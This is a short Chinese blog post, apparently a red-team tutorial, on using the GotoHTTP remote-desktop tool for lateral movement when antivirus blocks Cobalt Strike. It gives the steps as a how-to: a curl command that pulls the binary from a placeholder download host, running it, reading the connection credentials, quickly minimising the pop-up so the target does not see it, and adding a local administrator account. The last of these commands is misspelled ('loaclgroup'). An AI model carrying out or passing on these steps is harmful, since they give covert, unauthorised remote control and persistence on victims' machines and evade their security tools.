本文最后更新于521 天前,其中的信息可能已经过时
在有杀软拦截,CS无法上线的情况下,经常用到todesk和向日葵这两个远控工具进行横向移动。不过这两个工具现在好像不怎么好用了。不过无所谓,用其他的就是了,听说最近GotoHTTP很火,可以试试看。
GoToHTTP的优点和缺点
优点:
- B2C模式,无需安装控制端软件,有浏览器就可以远控。
- 流量走https协议,只要目标放行443端口出口就可以实现内网穿透。
- 在低带宽也可以使用,运行占用内存极低,控制时占用CPU仅为0%-3%。
- 被控端在类Linux系统上支持图形界面(GUI)和字符界面(CLI)。
缺点:
- 需要管理员权限运行
- 一些行为(网络唤醒远程主机)需要加载驱动,导致运行时360安全卫士会拦截这行为,其他杀软则不会拦截。
GoToHTTP下载
官网下载:http://www.gotohttp.com/goto/download.12x
win32or64网盘下载:点我下载
GoToHTTP提供了多种系统的被控端,可以根据情况选用。
GoToHTTP使用
上传GotoHTTP.exe
tip:如果目标机有curl命令
curl -o GotoHTTP.exe https://www.wangpan.com/GotoHTTP.exe
执行GotoHTTP.exe
成功生成gotohttp.ini配置文件
读取配置文件的连接信息
打开在线连接网站:https://sh2.gotohttp.com/
输入电脑ID(name)和控制码(tmp)连接
成功连接
注:成功连接后目标机会自动出现这个弹窗,手速要快,把它最小化
总结:
GotoHTTP可以成功绕过免杀进行远控但是需要的前提是有命令执行和文件上传功能
命令下载文件的话需要目标机器上面装有curl(应该还有其他方法)
而且连接成功后如果目标机器锁屏的话那也还是进不去桌面的
解决方法->创建一个用户
net user <username> <password> /add
添加XX到管理员账户
net loaclgroup administrators <username> /add
参考文章: